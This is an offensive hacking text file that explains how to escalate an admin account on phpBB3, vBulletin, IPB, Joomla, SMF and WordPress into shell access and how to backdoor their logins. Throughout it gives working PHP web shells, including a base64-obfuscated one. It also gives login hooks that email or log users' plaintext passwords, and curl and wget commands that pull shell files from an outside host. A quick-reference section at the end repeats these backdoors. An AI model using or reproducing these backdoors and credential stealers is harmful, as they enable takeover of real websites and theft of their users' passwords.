Shelling All Famous Boards (vBulletin,SMF,phpBB) etc

 _             _      _                     _
| |__  __ _ __| |____| |___  ___ _ _ ___ __| |
| '_ \/ _` / _| / / _` / _ \/ _ \ '_/ -_) _` |
|_.__/\__,_\__|_\_\__,_\___/\___/_| \___\__,_|        1. phpBB3
                                                      2. vBull
                    nTha                              3. IPB
                           ___ _    ___               4. Joomla
                          |_  ) |__/ _ \              5. SMF
                           / /| / /\_, /              6. Wordpress
                          /___|_\_\ /_/               7. QuickRef


This txt is about escalating access when you have an admin
account on a cms or forum and also backdooring the login
protocol.  Enjoy sluts - Will add more when I see em.

Note: This is a combined list some are my writings
and some are just grabbed from the nets.


     _       _____ _____ ___
 ___| |_ ___| __  | __  |_  |
| . |   | . | __ -| __ -|_  |
|  _|_|_|  _|_____|_____|___|
|_|     |_|

The newest version of the most popular free forum is phpBB3.
I would even venture to say phpBB is the most used forum on
the net today.  Anywho here we go.

Escalation:
Step 1. Admin Panel > Security Settings > Allow php.... ON
Step 2. Styles > Templates > Edit > faq_blah.html
Step 3. Enter following code.

<!-- PHP -->$cmd = $_GET['cmd'];
system("$cmd", $return);
?><!-- ENDPHP -->

Step 4.Call faq.php
Example: http://www.zomgownme.com/phpBB3/faq.php?cmd=ls

Login Backdoor:
Step 1. Open file includes/functions.php
Step 2. FIND
$result = $auth->login($username, $password, $autologin, $viewonline, $admin);
Step 3. Add this after it:
$sitename = "domain.tld";
$recipient = 'youremail@gmail.com';
$subject = 'Password Alert - sitename';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message);


     _____     _ _     _   _
 _ _| __  |_ _| | |___| |_|_|___
| | | __ -| | | | | -_|  _| |   |
 \_/|_____|___|_|_|___|_| |_|_|_|

vBulletin is the most popular paid forum.  It is constantly
upgraded and has the best support because of that.

Escalation:
Step 1. On the sidebar select Plugins & Products
Step 2. Select Add New Plugin
Step 3. Complete the form like below
Product: vBulletin
Hook Location: Ajax_Complete
Title: Whatever
Execution Order: 5
Code: if(isset($_GET['cmd'])){echo "<h1>lol</h1><pre>"; system($_GET['cmd']);exit;}
Check Plugin Is ACTIVE
click Save
Step 4. Now go to domain.com/path/ajax.php?cmd=ls

Login Backdoor:
For Versions 3.6.5-.10 & 3.7.0 & 3.7.3 PL1 & 3.8X

Step 1. Open global.php - it's in the main directory
Step 2. Search for the string below

$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

Step 3. Null the line out by adding // infront of the line

Step 4. Open login.php - it's in the main directory
Step 5. Search for process_new_login and add the following code under

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
   $lg_password = $vbulletin->GPC["vb_login_password"];
   $lg_file = "./includes/lg.html";
   $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

   while($row = @mysql_fetch_array($sql_query))
   {

      if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }

Step 6. Check the log file at domain.com/path/includes/lg.html to make sure
it's actually logging.  If it is not create the file and give it the proper
properties.


 _____ _____   _____               _
|     |  _  | | __  |___ ___ ___ _| |
|-   -|   __|_| __ -| . | .'|  _| . |
|_____|__|  |_|_____|___|__,|_| |___|

Invision Powerboard is another popular forum.  If it's popular you gotta know
how to own it.

Escalation:
Step 1. Go to Admin > Look and Feel > Manage languages
Step 2. Then choose public_help
Step 3. Edit help_txt which originally is "Choose a topic from the list or search..."
Step 4. Add php code like below

${${phpinfo()}}
${${system(wget http://domain.com/shell.txt)}}

Step 5. Save changes
Step 6. Then go to the help module which is located at
http://domain.com/ipb/index.php?app=core&module=help

No Logging here haven't had to yet.


    __               _
 __|  |___ ___ _____| |___
|  |  | . | . |     | | .'|
|_____|___|___|_|_|_|_|__,|

Joomla is a free CMS and is widely used.

Escalation Method 1:
Step 1. Select Extensions at the top and go to Template Manager
Step 2. Seletect the template and go to edit HTML
Step 3. Add php code to get a shell on the site

system("curl -o shell.php http://www.domain.com/shell.txt");
$cmd = $_GET['cmd'];
system("$cmd", $return);

Escalation Method 2:
Step 1. Go to Configuration
Step 2. Go to System
Step 3. Allow .php in extensions
Step 4. Go the media manager
Step 5. Then upload your shell


 _____ _____ _____
|   __|     |   __|
|__   | | | |   __|
|_____|_|_|_|__|

Simple Machine Forums is another freebie for kids on the interwebs.

Escalation for SMF 1.1.4 Method 1:
Step 1. Enable Attachments
Step 2. Disable encrypt filenames function
Step 3. Enable php extension
Step 4. Upload an attachment(shell.php) in a new topic window.

Escalation for SMF 1.1.4 Method 2:
You can edit the template and add php code to it.


 _ _ _           _
| | | |___ ___ _| |___ ___ ___ ___ ___
| | | | . |  _| . | . |  _| -_|_ -|_ -|
|_____|___|_| |___|  _|_| |___|___|___|
                  |_|

The most common blogger software.

Escalation Method 1:
Step 1. Login as Admin and Click on Media on the sidebar
Step 2. Click add new under library
Step 3. Click Select files and upload your shell
Step 4. Once uploaded a prompt will come up and give you
the path to the shell

Escalation Method 2:
Step 1. Login as admin and click on appearance on the sidebar
step 2. Click Editor
Step 3. Click Comments(comments.php) on the right side
Step 4. Insert your php code
Step 5. Call comments.php in the wordpress template
www.domain.com/wp-content/themes/atahualpa.3.2/atahualpa/comments.php


 _____     _     _      _____     ___
|     |_ _|_|___| |_   | __  |___|  _|___ ___ ___ ___ ___ ___ ___
|  |  | | | |  _| '_|  |    -| -_|  _| -_|  _| -_|   |  _| -_|_ -|
|__  _|___|_|___|_,_|  |__|__|___|_| |___|_| |___|_|_|___|___|___|
   |__|

This is a little area I added since I know I will be referring to this document
frequently.  These are just simple things I use alot and instead of searching
for txt files on my pc I can just quickly view it here.

1. Python Simple httpserver good for quickly dling dbs without having to cp or mv'n
python -m SimpleHTTPServer 39282   (thanks w)

2. Simple phpdoor I use frequently.
$cmd = $_GET['cmd'];
system("$cmd", $return);
          or
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyBpZigkX0dFVFsnY21kJ10peyBzeXN0ZW0oJF9HRVRbJ2NtZCddLCAkcmV0dXJuKTsgfQ=='));
          or
if($@_GET['file']){
include($_GET['file']);
}

3. Find writeable areas
find . -perm -2 -ls

4. Tar up a directory
tar -cvzf name folder

5. i <3 curl
curl -o shell.php http://www.domain.com/shell.txt